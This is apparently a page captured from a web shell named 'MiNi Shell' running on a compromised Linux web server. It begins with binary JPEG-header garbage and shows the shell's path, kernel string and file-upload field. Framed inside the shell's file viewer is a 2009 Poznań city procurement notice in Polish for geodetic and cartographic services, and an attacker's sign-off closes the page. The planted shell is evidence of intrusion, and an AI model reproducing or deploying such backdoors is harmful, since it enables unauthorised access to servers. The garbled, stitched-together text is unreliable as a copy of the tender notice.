JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090911/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090911/315890-N-2009.html

<p class="kh_header"><b>Poznań: Świadczenie usług geodezyjnych i kartograficznych dla potrzeb związanych z bieżącym funkcjonowaniem Wydziału Gospodarki Nieruchomościami Urzędu Miasta Poznania.</b><br>
<b>Numer ogłoszenia: 315890 - 2009; data zamieszczenia: 11.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miasta Poznania, Biuro Zamówień Publicznych , Pl. Kolegiacki 17, 61-841 Poznań, woj. wielkopolskie, tel. (061) 878 52 65.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.city.poznan.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług geodezyjnych i kartograficznych dla potrzeb związanych z bieżącym funkcjonowaniem Wydziału Gospodarki Nieruchomościami Urzędu Miasta Poznania..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Szczegółowy opis przedmiotu zamówienia określa załącznik nr 1 do SIWZ.
Wykonawca będzie wykonywał usługi zgodnie z przepisami ustawy z dnia 17 maja 1989 r. Prawo geodezyjne i kartograficzne (Dz. U. z 2005 r., Nr 240, poz. 2027 ze zm.) oraz rozporządzeniem Ministra Spraw Wewnętrznych i Administracji z dnia 24 marca 1999 r. w sprawie standardów technicznych dotyczących geodezji, kartografii oraz krajowego systemu informacji o terenie (Dz. U. Nr 30, poz. 297)..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.35.40.00-4, 71.35.32.00-9, 71.35.43.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wykonawca zobowiązany jest wnieść wadium w formach wymienionych w art. 45 ust. 6 ustawy Prawo zamówień publicznych w wysokości:
Część I: 	                500,00 zł
Część II: 	   840,00 zł
Część III:	1 200,00 zł
Część IV:	   370,00 zł<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.	Posiadanie uprawnień do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.
2.	Posiadanie niezbędnej wiedzy i doświadczenia oraz dysponowanie potencjałem technicznym i osobami zdolnymi do wykonania zamówienia (lub dysponowanie dostępem do potencjału technicznego i osób zdolnych do wykonania zamówienia):
2.1	dysponowanie przez Wykonawcę:
1)	w przypadku składania oferty na część I - min. 1 osobą z uprawnieniami zawodowymi w dziedzinie geodezji i kartografii w zakresach:
a)	geodezyjne pomiary sytuacyjno-wysokościowe, realizacyjne i inwentaryzacyjne,
b)	rozgraniczanie i podziały nieruchomości (gruntów) oraz sporządzanie dokumentacji do celów prawnych,
2)	w przypadku składania oferty na część II - min. 1 osobą z uprawnieniami zawodowymi w dziedzinie geodezji i kartografii w zakresach:
a)	geodezyjne pomiary sytuacyjno-wysokościowe, realizacyjne i inwentaryzacyjne,
b)	rozgraniczanie i podziały nieruchomości (gruntów) oraz sporządzanie dokumentacji do celów prawnych,
3)	w przypadku składania oferty na część III - min. 1 osobą z uprawnieniami zawodowymi w dziedzinie geodezji i kartografii w zakresach:
a)	geodezyjne pomiary sytuacyjno-wysokościowe, realizacyjne                         i inwentaryzacyjne,
b)	rozgraniczanie i podziały nieruchomości (gruntów) oraz sporządzanie dokumentacji do celów prawnych,
4)	w przypadku składania oferty na część IV - min. 1 osobą z uprawnieniami zawodowymi w dziedzinie geodezji i kartografii w zakresach:
a)	geodezyjne pomiary sytuacyjno-wysokościowe, realizacyjne                          i inwentaryzacyjne,
b)	rozgraniczanie i podziały nieruchomości (gruntów) oraz sporządzanie dokumentacji do celów prawnych.
W przypadku składania oferty na kilka części, składający ofertę musi dysponować osobami posiadającymi uprawnienia w ilości odpowiadającej sumie osób wymaganych w tych częściach.
2.2	wykonanie z należytą starannością w okresie ostatnich trzech lat przed dniem wszczęcia postępowania (10 września 2006 r. - 10 września 2009 r.), a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, usług geodezyjnych i kartograficznych:
Wykonawcy składający ofertę na Część I
Świadczenie usług geodezyjnych niezbędnych dla przeprowadzenia podziału geodezyjnego nieruchomości na potrzeby realizacji zadania gospodarowania nieruchomościami Miasta Poznania i Skarbu Państwa muszą się wykazać doświadczeniem z zakresu:
1. Przygotowania wstępnego projektu podziału - minimum 6 opracowań, dla którejkolwiek z trzech grup wyszczególnionych w załączniku nr 1 do SIWZ z podaniem numeru rejestracji w Krajowym Rejestrze Usług Geodezyjnych oraz oznaczenia geodezyjnego nieruchomości, której opracowanie dotyczyło.
2. Wykonanie projektu podziału - minimum 6 opracowań, dla którejkolwiek z trzech grup wyszczególnionych w załączniku nr 1 do SIWZ z podaniem numeru rejestracji w Krajowym Rejestrze Usług Geodezyjnych oraz oznaczenia geodezyjnego nieruchomości, której opracowanie dotyczyło.
3. Wykonania wyniesienia podziału w teren wraz ze sporządzeniem  wyciągu z wykazu zmian danych ewidencyjnych - minimum 6 opracowań, dla którejkolwiek z trzech grup wyszczególnionych w załączniku nr 1 do SIWZ z podaniem numeru rejestracji w Krajowym Rejestrze Usług Geodezyjnych oraz oznaczenia geodezyjnego nieruchomości, której opracowanie dotyczyło.
Wykonawcy składający ofertę na Część II
Świadczenie usług geodezyjnych niezbędnych dla przeprowadzenia podziału geodezyjnego nieruchomości na potrzeby realizacji zadania komunalizacji mienia muszą się wykazać doświadczeniem z zakresu:
1. Przygotowania wstępnego projektu podziału (dla pkt 1 i 4 części II) - minimum 8 opracowań, dla którejkolwiek z trzech grup wyszczególnionych w załączniku nr 1 do SIWZ z podaniem numeru rejestracji w Krajowym Rejestrze Usług Geodezyjnych oraz oznaczenia geodezyjnego nieruchomości, której opracowanie dotyczyło.
2. Wykonanie projektu podziału (pkt 2 i 5 części II) - minimum  8 opracowań, dla którejkolwiek z trzech grup wyszczególnionych w załączniku nr 1 do SIWZ z podaniem numeru rejestracji w Krajowym Rejestrze Usług Geodezyjnych oraz oznaczenia geodezyjnego nieruchomości, której opracowanie dotyczyło.
3. Wykonania wyniesienia podziału w teren wraz ze sporządzeniem  wyciągu z wykazu zmian danych ewidencyjnych (pkt 3 i  6części II) - minimum 8 opracowań, dla którejkolwiek z trzech grup wyszczególnionych w załączniku nr 1 do SIWZ z podaniem numeru rejestracji w Krajowym Rejestrze Usług Geodezyjnych oraz oznaczenia geodezyjnego nieruchomości, której opracowanie dotyczyło.
Wykonawcy składający ofertę na Część III
Świadczenie usług geodezyjnych i kartograficznych na potrzeby realizacji zadania komunalizacji mienia muszą się wykazać doświadczeniem z zakresu:
1.	Sporządzenie mapy stanu prawnego dostosowania ewidencji gruntów do stanu prawnego wykazanego w księgach wieczystych. Mapa stanu prawnego winna być wykonana na podstawie badania ksiąg wieczystych oraz badania katastru nieruchomości - 5 map stanu prawnego.
2.	Sporządzenie operatu dostosowującego ewidencję gruntów do stanu prawnego wykazanego w księgach wieczystych, w zakresie uzgodnionym z przedstawicielem zamawiającego oraz przygotowanie wyciągu z wykazu zmian danych ewidencyjnych do wykazania aktualnego stanu prawnego gruntów Skarbu Państwa w księgach wieczystych - 5 operatów dostosowujących ewidencję gruntów do stanu prawnego wykazanego w księgach wieczystych z podaniem numeru rejestracji w Krajowym Rejestrze Usług Geodezyjnych oraz oznaczenia geodezyjnego nieruchomości, której opracowanie dotyczyło.
3.	Sporządzenie operatu dostosowującego oznaczenie nieruchomości w księgach wieczystych do stanu prawnego wykazanego w katastrze nieruchomości, wraz ze sporządzeniem wyciągu z wykazu zmian danych ewidencyjnych. Sporządzenie operatu należy wykonać na podstawie badania ksiąg wieczystych, wraz z ustaleniem i udokumentowaniem podstawy prawnej nabycia nieruchomości na rzecz Skarbu Państwa - 5 operatów dostosowujących  oznaczenie nieruchomości w księgach wieczystych do stanu prawnego wykazanego w katastrze nieruchomości z podaniem numeru rejestracji w Krajowym Rejestrze Usług Geodezyjnych oraz oznaczenia geodezyjnego nieruchomości, której opracowanie dotyczyło.
4.	Sporządzenie operatu dostosowującego kataster nieruchomości do stanu faktycznego w terenie, wraz ze sporządzeniem wyciągu w wykazu zmian danych ewidencyjnych - 5 operatów dostosowujących kataster nieruchomości do stanu faktycznego w terenie z podaniem numeru rejestracji w Krajowym Rejestrze Usług Geodezyjnych oraz oznaczenia geodezyjnego nieruchomości, której opracowanie dotyczyło.
Wykonawcy składający ofertę na Część IV
Świadczenie usług geodezyjnych i kartograficznych na potrzeby realizacji zadania gospodarowania nieruchomościami Miasta Poznania i Skarbu Państwa muszą się wykazać doświadczeniem z zakresu:
1.	Aktualizacji danych ewidencji gruntów i budynków, połączenia działek - minimum 10 usług aktualizacji danych.
2.	Sporządzenie map stanu prawnego terenu - minimum 5 map stanu prawnego z podaniem numeru rejestracji przedmiotowych prac w Krajowym Rejestrze Usług Geodezyjnych.
3.	Opracowania inwentaryzacji powykonawczej budynków - minimum 5 opracowań inwentaryzacji powykonawczej budynków.
4.	Sporządzania map zasadniczych dla celów projektowych w skali 1:500 - minimum 5 opracowań kartograficznych dla którejkolwiek z czterech grup wyszczególnionych w załączniku nr 1 do SIWZ.
5.	Wznowienie granic nieruchomości - minimum 5  usług dla którejkolwiek z dwóch grup wyodrębnionych według kryterium ilości punktów granicznych wyszczególnionych w załączniku nr 1 do SIWZ.
3.	Znajdowanie się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenia spełniania warunków udziału w postępowaniu, Wykonawca zobowiązany jest złożyć następujące oświadczenia, dokumenty:
1.	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert oraz jeżeli zasady reprezentacji nie wynikają jednoznacznie z przedłożonych wypisów (odpisów), wymaga się złożenia dokumentu (w formie oryginału lub notarialnie poświadczonej kopii) wskazującego osobę uprawnioną do reprezentowania składającego (składających) ofertę;
2.	Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
3.	Wypełnione i podpisane oświadczenie o spełnieniu warunków udziału w postępowaniu - zał. nr 2 do SIWZ oraz, uzupełniająco, w przypadku korzystania z potencjału innych podmiotów, pisemne zobowiązanie tych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia.
4.	Wykaz osób przewidzianych do wykonania zamówienia w liczbie odpowiedniej do części, na które składana jest oferta (zgodnie z punktem V.2.1 SIWZ) wraz z dokumentami potwierdzającymi posiadanie uprawnień zawodowych w dziedzinie geodezji i kartografii nadanych w trybie art. 45 ustawy z  17 maja 1989 r. Prawo geodezyjne i kartograficzne (Dz. U. z 2005 r., Nr 240, poz. 2027 ze zm.) - wzór wykazu - zał. nr 7 do SIWZ; 
5.	Wykaz wykonanych w okresie ostatnich trzech lat przed dniem wszczęcia postępowania (10 września 2006 r. - 10 września 2009 r.), a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, usług geodezyjnych i kartograficznych wymaganych przez Zamawiającego w pkt. V 2.2 SIWZ wraz dokumentami potwierdzającymi, że usługi te zostały wykonane z należytą starannością (wzór wykazu - załącznik nr 5 do SIWZ).
Ponadto w ofercie należy złożyć:
6.	Odpowiednio wypełniony i podpisany formularz ofertowy - zał. nr 3 do SIWZ;
7.	Wypełniony (w częściach, na które Wykonawca składa ofertę) i podpisany załącznik nr 1 do SIWZ.
8.	Pełnomocnictwo do reprezentowania Wykonawców składających ofertę wspólną w postępowaniu albo reprezentowania w postępowaniu i zawarcia umowy (w formie oryginału lub potwierdzonej notarialnie kopii)..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.city.poznan.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> W siedzibie Zamawiającego w pok. 443 lub pobrać ze strony internetowej http://www.bip.city.poznan.pl.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.09.2009 godzina 11:45, miejsce: Urząd Miasta Poznania, Biuro Zamówień Publicznych, pl. Kolegiacki 17, 61-841 Poznań, pok. 446.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com